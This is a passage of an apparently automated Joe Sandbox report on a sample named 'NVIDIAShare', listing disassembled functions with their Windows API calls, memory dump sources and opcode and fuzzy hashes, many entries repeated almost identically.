                                                            • Opcode Fuzzy Hash: cabcb3d475f7f0ca561821c1a000aa4e3ce63e5fffa1e78470a796463ae9a05b
                                                            • Instruction Fuzzy Hash: 89F0B43250513567FB715A26AC05B9F3B88AB91770BB8C151E9C89B190CA30D90183E0
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 01023C3F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: ca2948b6215143db9662ff26e1177afafa980f8dbb060494f347ce261efd399f
                                                            • Instruction ID: 5c654ee7116b342b02a3a46c1418474835b8131b5591d5f59751335c8fee03aa
                                                            • Opcode Fuzzy Hash: ca2948b6215143db9662ff26e1177afafa980f8dbb060494f347ce261efd399f
                                                            • Instruction Fuzzy Hash: 4BF0A73220022A9F9F124E6EEC1099A7BD9FF49B207204124FB85DF190DB35E420C790
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102CA2C,00000000,?,01026CBE,?,00000008,?,010291E0,?,?,?), ref: 01028E38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 1ca9b14d87cd35ae73b6d311ca7b21e72faa09b4c9e1e08fd8752185ff95eb78
                                                            • Instruction ID: 6e3ad07e0d3cb5a1f467e574a9a54423315807e4e8bdd9bd534dc7f4a81142fb
                                                            • Opcode Fuzzy Hash: 1ca9b14d87cd35ae73b6d311ca7b21e72faa09b4c9e1e08fd8752185ff95eb78
                                                            • Instruction Fuzzy Hash: 34E0653960613556EEB126699C04B9F7ACC9F517B4F15C193EDD897080CB65CC0082E1
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 01005AC2
                                                              • Part of subcall function 0100B505: __EH_prolog.LIBCMT ref: 0100B50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 5c9cb1e471cee9b88f5bcca5426f7c0d36ef21cc8cfb1d0eec12008dffda73da
                                                            • Instruction ID: 95c004d0d7deed5b4b6e06d9f91013bd735eaeffec939151e846667c64675ba9
                                                            • Opcode Fuzzy Hash: 5c9cb1e471cee9b88f5bcca5426f7c0d36ef21cc8cfb1d0eec12008dffda73da
                                                            • Instruction Fuzzy Hash: 1C018C30810695DAD726E7B8C0407DDFBA4BF78204F60888D94DA53285CBB81B08D7A2
                                                            APIs
                                                              • Part of subcall function 0100A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6C4
                                                              • Part of subcall function 0100A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6F2
                                                              • Part of subcall function 0100A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6FE
                                                            • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0100A598
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Find$FileFirst$CloseErrorLast
                                                            • String ID:
                                                            • API String ID: 1464966427-0
                                                            • Opcode ID: 6d7457f10a0d7fc31f6e8336a68044539e04b98b38a236259cc851e548fa7f16
                                                            • Instruction ID: 756d466e9db7a9a8472cc89dc540bce24e4fd6ca8a202e3e87f9ba7bc4b1c80d
                                                            • Opcode Fuzzy Hash: 6d7457f10a0d7fc31f6e8336a68044539e04b98b38a236259cc851e548fa7f16
                                                            • Instruction Fuzzy Hash: 60F05E35009790EAEA6367B88904BCBBBA46F2A332F048A49F1F9531D5C37650948B22
                                                            APIs
                                                            • SetThreadExecutionState.KERNEL32(00000001), ref: 01010E3D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ExecutionStateThread
                                                            • String ID:
                                                            • API String ID: 2211380416-0
                                                            • Opcode ID: 101240a25dc0115856865d5a50dfc545165bb877ce10b2337d70e74e2bd91fcb
                                                            • Instruction ID: a647dc6ef2056e2f0035351e986774ff2540b64a2fcbc12faf9c71d53334b519
                                                            • Opcode Fuzzy Hash: 101240a25dc0115856865d5a50dfc545165bb877ce10b2337d70e74e2bd91fcb
                                                            • Instruction Fuzzy Hash: 05D0C230B0106A16EA6633396494BFE298B9FE6210F0C0065B2C55B2CECAAE0482A261
                                                            APIs
                                                            • GdipAlloc.GDIPLUS(00000010), ref: 0101A62C
                                                              • Part of subcall function 0101A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0101A3DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Gdip$AllocBitmapCreateFromStream
                                                            • String ID:
                                                            • API String ID: 1915507550-0
                                                            • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                            • Instruction ID: b756999aa64b5d282eb878efbe0ab4a01eab456bea9e215b03cb9147fe51894d
                                                            • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                            • Instruction Fuzzy Hash: 3DD0A93030120AFAEF426B21CC02AAF7AA9EB58240F008421BCC2C6184EAB9D9109261
                                                            APIs
                                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,01011B3E), ref: 0101DD92
                                                              • Part of subcall function 0101B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101B579
                                                              • Part of subcall function 0101B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B58A
                                                              • Part of subcall function 0101B568: IsDialogMessageW.USER32(0001044E,?), ref: 0101B59E
                                                              • Part of subcall function 0101B568: TranslateMessage.USER32(?), ref: 0101B5AC
                                                              • Part of subcall function 0101B568: DispatchMessageW.USER32(?), ref: 0101B5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                            • String ID:
                                                            • API String ID: 897784432-0
                                                            • Opcode ID: 9b6ed345331ff3b54f0b234b7c94673597f7cb20d0bf0a8d405792b3c2dd822e
                                                            • Instruction ID: 0dbb338a7048243b39e188002a5bb92d0cb4d8cdd38cea8fbcb1ecc6a1ebdd9b
                                                            • Opcode Fuzzy Hash: 9b6ed345331ff3b54f0b234b7c94673597f7cb20d0bf0a8d405792b3c2dd822e
                                                            • Instruction Fuzzy Hash: 80D09E71144300BBD6112B51CE06F4A7AB2BB99B04F404955B3C4740B4CA779D61EB11
                                                            APIs
                                                            • DloadProtectSection.DELAYIMP ref: 0101E5E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: DloadProtectSection
                                                            • String ID:
                                                            • API String ID: 2203082970-0
                                                            • Opcode ID: d930e5b9385fd8ca8887850c0ba9ca44294a8aa34f83e07c2a4ec37f781d3a9a
                                                            • Instruction ID: f24ffd3c0d9de15338cb36a0ee711db0cb88598c4778754a3443df5f911b958a
                                                            • Opcode Fuzzy Hash: d930e5b9385fd8ca8887850c0ba9ca44294a8aa34f83e07c2a4ec37f781d3a9a
                                                            • Instruction Fuzzy Hash: F6D012B01402459BE763EBACE445F5C77E9B368B60F800545FEC9D645CEB7D8180D705
                                                            APIs
                                                            • GetFileType.KERNELBASE(000000FF,010097BE), ref: 010098C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: FileType
                                                            • String ID:
                                                            • API String ID: 3081899298-0
                                                            • Opcode ID: 0e67af4597f19861898c331419ecf5b81a5b553dc04a50b0f47363dbc3069fb5
                                                            • Instruction ID: 1fb0e3154a6043a8d13b8d0db464858d1214f0d85553763f3737c6482a8f597e
                                                            • Opcode Fuzzy Hash: 0e67af4597f19861898c331419ecf5b81a5b553dc04a50b0f47363dbc3069fb5
                                                            • Instruction Fuzzy Hash: AAC01274400105C59E73462894440957751AA42279BB486D4D0AC891D3C333C547EB10
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 6b27047d551c094225fa10cc201edd48a872d2288f3244810cdc5bb864228367
                                                            • Instruction ID: 5ff96de9461d4158f60c1b91e5365f93a8f1105dc464786ec99da415e3066450
                                                            • Opcode Fuzzy Hash: 6b27047d551c094225fa10cc201edd48a872d2288f3244810cdc5bb864228367
                                                            • Instruction Fuzzy Hash: 85B012E5258101FC30051196DD06CBF111CF6C2A10320842FFCCADC484D8449C410471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: fab5e3af31f04a0a31b1398938baa0f89f71afdb44e88839223d9ecf3cbb8e7a
                                                            • Instruction ID: ca840653b39987abb5a73845b38773fea99e3f6d3893212e7b8b6933f2efc414
                                                            • Opcode Fuzzy Hash: fab5e3af31f04a0a31b1398938baa0f89f71afdb44e88839223d9ecf3cbb8e7a
                                                            • Instruction Fuzzy Hash: 24B012E525C101EC3005519ADD06CBF111CF6C1910320402FFCCECC084D8445C410571
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: bff7b3a8d121b01c051bb420b9bf95d8aba96cf310e8717b5230441f12f3c440
                                                            • Instruction ID: 0bf389340c27f92d10abb063e0b80ad5b6fff3411c75cd12cbb4e7e8c97b338e
                                                            • Opcode Fuzzy Hash: bff7b3a8d121b01c051bb420b9bf95d8aba96cf310e8717b5230441f12f3c440
                                                            • Instruction Fuzzy Hash: 70B012E1258001EC30055656DD05CBF111CF6C1A20320C02FFCCECC184D8449C450471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 4bf480fb42819d87d6ea78b6d3be9e05231d8e84a45f5f434e8a7a9d0d54e2cc
                                                            • Instruction ID: 16b6728ec751a05294144d33f3e699467f803e35b0dea1ccac81917338dd6c99
                                                            • Opcode Fuzzy Hash: 4bf480fb42819d87d6ea78b6d3be9e05231d8e84a45f5f434e8a7a9d0d54e2cc
                                                            • Instruction Fuzzy Hash: 9EB012E1368141FD30455256DD05CBF111CF6C0920320812FFCCECC184D8445C850471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 5ad2404d985bae6c0c62a8073c4742a55d3166dffb5b074b7445e39b6b4ef89c
                                                            • Instruction ID: cd70605c8cdcf644768da5b1626b17a05adff152b0e3ca669021a47e8f7d4e34
                                                            • Opcode Fuzzy Hash: 5ad2404d985bae6c0c62a8073c4742a55d3166dffb5b074b7445e39b6b4ef89c
                                                            • Instruction Fuzzy Hash: 38B012E1258001EC30055256DE05CBF111CF6C0920320802FFCCECC184DC445D4A0471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 2ae7688a7df7a270238c71aed01d3d17fd48da2f69d9ae0f23d950418f1dec7d
                                                            • Instruction ID: 10525fe6a56efb750e824890774332c6b5c10526b59e977fc2a31927558e2381
                                                            • Opcode Fuzzy Hash: 2ae7688a7df7a270238c71aed01d3d17fd48da2f69d9ae0f23d950418f1dec7d
                                                            • Instruction Fuzzy Hash: 8AB012F1258001FC30055156DD05CBF115CF6C1F10320802FFCCECC084D8449D450471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
